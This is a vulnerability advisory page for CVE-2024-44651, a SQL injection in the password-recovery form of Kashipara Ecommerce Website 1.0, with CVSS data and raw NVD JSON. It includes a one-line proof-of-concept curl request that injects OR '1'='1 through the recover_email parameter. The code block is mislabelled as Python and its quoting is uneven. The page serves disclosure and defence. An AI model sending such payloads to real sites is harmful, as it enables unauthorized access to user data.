Security Vulnerability Report
中文
CVE-2024-44651 CVSS 6.5 MEDIUM

CVE-2024-44651

Published: 2025-11-17 18:15:55
Last Modified: 2025-11-19 13:09:40

Description

Kashipara Ecommerce Website 1.0 is vulnerable to SQL Injection via the recover_email parameter in user_password_recover.php.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:kashipara:ecommerce_website:1.0:*:*:*:*:*:*:* - VULNERABLE
Kashipara Ecommerce Website 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
curl -X POST 'http://target/user_password_recover.php' -d '[email protected]' OR '1'='1

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-44651", "sourceIdentifier": "[email protected]", "published": "2025-11-17T18:15:55.107", "lastModified": "2025-11-19T13:09:39.673", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Kashipara Ecommerce Website 1.0 is vulnerable to SQL Injection via the recover_email parameter in user_password_recover.php."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:kashipara:ecommerce_website:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "8310BCC9-1851-4B2A-9894-B774274C867C"}]}]}], "references": [{"url": "https://github.com/leexsoyoung/CVEs/blob/main/CVE-2024-44651.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.kashipara.com/project/php/322/ecommerce-website-in-php-with-source-code-download", "source": "[email protected]", "tags": ["Product"]}]}}